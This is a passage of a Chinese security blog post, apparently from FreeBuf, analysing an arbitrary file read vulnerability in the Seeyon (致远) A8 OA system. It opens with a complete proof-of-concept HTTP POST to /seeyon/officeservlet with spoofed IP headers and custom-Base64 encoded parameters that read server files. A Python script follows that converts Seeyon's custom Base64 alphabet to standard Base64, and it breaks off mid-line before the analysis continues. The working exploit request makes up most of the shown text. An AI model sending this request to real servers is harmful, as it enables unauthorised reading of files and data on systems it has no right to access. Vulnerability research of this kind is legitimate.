一、前言
这段时间从其他师傅那里拿到了分析的致远源码,想着就照着历史漏洞来做个算是仔细的分析。
这边选取致远A8的任意文件读取漏洞来结合源码分析下,首先漏洞利用POC如下
POST /seeyon/officeservlet HTTP/1.1 Host: xxxx Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=98FCAEBB95CCBEB2C7209BEF7EAA7B3E; loginPageURL= x-forwarded-for: 127.0.0.1 x-originating-ip: 127.0.0.1 x-remote-ip: 127.0.0.1 x-remote-addr: 127.0.0.1 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 350 DBSTEP V3.0 285 0 0 RECORDID=wLoi CREATEDATE=wLehP4whzUoiw=66 originalFileId=wLoi needReadFile=yRWZdAS6 originalCreateDate=wLehP4whzUoiw=66 OPTION=LKDxOWOWLlxwVlOW TEMPLATE=qf85qf85qfDfeazQqAzvcRevy1W3eazvNaMUySz3d7TsdRDsyaM3nYli COMMAND=BSTLOlMSOCQwOV66 affairMemberId=wLoi affairMemberName=wLoi
二、漏洞分析
首先看上面的请求体中带有加密后传的参数内容,这类是属于致远自定的Base64编码的变种,详细解密方法可以参考kk师傅的文章:致远 OA 变种 BASE64 算法的加解密方法(https://paper.seebug.org/964/)
这里贴上一个解密脚本,仅可用于解密传参,不能解密数据库密码密文
import base64 # 自定义的Base64编码表 a = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6" # 标准的Base64编码表 b = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" # 函数:自定义Base64编码转换为标准Base64编码 def custom_to_standard(custom_base64_str): standard_base64_str = "" # 创建映射字典 custom_to_standard_map = {ca: cb for ca, cb in zip(a, b)} for char in custom_base64_str: # 查找自定义字符对应的标准Ba
已在FreeBuf发表 0 篇文章
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022